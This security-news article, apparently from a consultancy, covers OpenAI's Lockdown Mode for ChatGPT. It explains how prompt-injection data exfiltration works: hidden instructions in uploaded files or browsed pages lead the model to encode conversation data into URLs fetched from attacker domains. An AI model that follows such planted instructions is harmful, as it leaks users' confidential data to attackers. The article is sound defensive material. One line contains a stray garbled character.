- What: OpenAI released Lockdown Mode for ChatGPT, an optional security setting that disables web-connected features to prevent data exfiltration via prompt injection attacks.
- Impact: Organizations handling sensitive data in ChatGPT conversations face ongoing risk of attackers extracting confidential information through malicious prompts embedded in uploaded files or browsed content.
- Fix / mitigation: Enable Lockdown Mode in ChatGPT account settings to disable live web browsing, image support, deep research, agent mode, Canvas networking, and file downloads.
- Who's at risk: ChatGPT users on Free, Go, Plus, Pro, and self-serve Business plans who process sensitive organizational or customer data through LLM interactions.
OpenAI has deployed Lockdown Mode for ChatGPT, a hardened security configuration designed to close data exfiltration pathways exploited through prompt injection attacks. Available now to logged-in users across Free, Go, Plus, Pro, and self-serve Business tiers, the feature targets organizations and individuals handling sensitive data who require stricter protection than standard ChatGPT sandboxing provides.
Prompt injection remains an unsolved foundational vulnerability across all large language models. Attackers embed malicious instructions in uploaded documents, website content, or file attachments that override the LLM's intended behavior. Once injected, these instructions can command the model to extract conversation history, uploaded files, or other sensitive context and transmit it to attacker-controlled infrastructure through outbound network requests.
What Lockdown Mode Actually Blocks
Lockdown Mode does not prevent prompt injections from occurring. OpenAI is explicit: malicious instructions hidden in uploaded files can still affect ChatGPT's behavior and cause incorrect answers. What Lockdown Mode does is eliminate the network-connected features attackers rely on to exfiltrate data after a successful injection.
The feature disables six capabilities that can initiate outbound network requests:
- Live web browsing – restricted to cached content only, preventing real-time requests to attacker-controlled URLs
- Image support – blocks displaying images in responses or retrieving images from external sources
- Deep research mode – disables the research agent that performs multi-step web queries
- Agent mode – removes autonomous task execution that involves network access
- Canvas networking – prevents Canvas-generated code from making network calls even with user approval
- File downloads – blocks downloading files created during data analysis workflows
OpenAI warns that Lockdown Mode "does not guarantee that data exfiltration cannot happen." Risk remains through enabled third-party apps, unforeseen capability combinations, or newly discovered exfiltration techniques. Memory and file uploads continue to function normally, and conversation sharing is unaffected.
The Prompt Injection Problem
Prompt injection is what OpenAI calls a "frontier" problem – one that affects all LLMs architecturally and has no complete solution. Unlike traditional injection attacks (SQL injection, command injection) where input sanitization can block malicious payloads, LLMs are designed to follow instructions in natural language. Distinguishing between legitimate user instructions and attacker-injected commands embedded in processed content is fundamentally difficult.
Data exfiltration attacks typically follow this pattern: an attacker embeds malicious prompts in a PDF, website, or document. When a user uploads that file or asks ChatGPT to browse that site, the LLM processes the hidden instructions. The injected prompt commands the model to encode sensitive conversation data into a URL parameter and fetch an image or resource from an attacker-controlled domain. Standard ChatGPT sandboxing blocks some of these techniques, but Lockdown Mode adds defense-in-depth by removing the network features entirely.
Deployment Constraints
Lockdown Mode is mutually exclusive with Developer Mode. Enabling one automatically disables the other, forcing organizations to choose between maximum security posture and developer-focused features. OpenAI emphasizes the feature is "not intended for everyone" – the disabled capabilities represent core ChatGPT functionality that many workflows depend on. Organizations must assess whether their data sensitivity justifies the loss of web research, image analysis, and code execution capabilities.
Alongside Lockdown Mode, OpenAI launched session management features that display all active ChatGPT sessions with device type, app, approximate location, sign-in timestamp, and trusted device status. Users can terminate individual sessions or全sessions if unauthorized access is detected – a standard security control that was previously absent.
Implementation Guidance
Security teams should evaluate Lockdown Mode deployment based on data classification. Enable it for users who routinely process customer PII, financial data, proprietary source code, or regulated health information through ChatGPT. For general productivity use cases where sensitive data exposure is minimal, the feature's restrictions likely outweigh its benefits.
Document which disabled features your organization relies on before enabling Lockdown Mode. Deep research and web browsing are frequently used for competitive intelligence and market research. Canvas is embedded in many software development workflows. File downloads support data science and analytics use cases. If these capabilities are critical, consider isolating sensitive data workloads to dedicated accounts with Lockdown Mode while maintaining standard ChatGPT access for general tasks.
The Bigger Picture
Lockdown Mode represents OpenAI's acknowledgment that prompt injection cannot be solved at the model level with current architectures. Instead of attempting to make LLMs immune to injected instructions, the approach shifts to containment: assume compromise will occur and eliminate exfiltration pathways. This mirrors traditional defense-in-depth strategies where perimeter breaches are assumed and lateral movement is constrained.
The limitation that third-party ChatGPT apps remain functional in Lockdown Mode is significant. The GPT Store hosts thousands of custom GPTs with varying security postures. Any app with network capabilities could potentially serve as an exfiltration channel even with Lockdown Mode enabled. Organizations with strict data protection requirements should audit which apps users have authorized and establish policies around third-party GPT usage.
For security teams building LLM-integrated applications, Lockdown Mode offers a preview of necessary architectural controls. Application-layer LLM deployments should implement similar network segmentation, limit outbound connections from LLM execution contexts, and assume that prompt injections will successfully manipulate model behavior. The focus should shift from preventing injection to preventing the consequences of injection.
Questions about your exposure?
RedEye Security provides assessments for organizations that need to understand their real risk.
Talk to us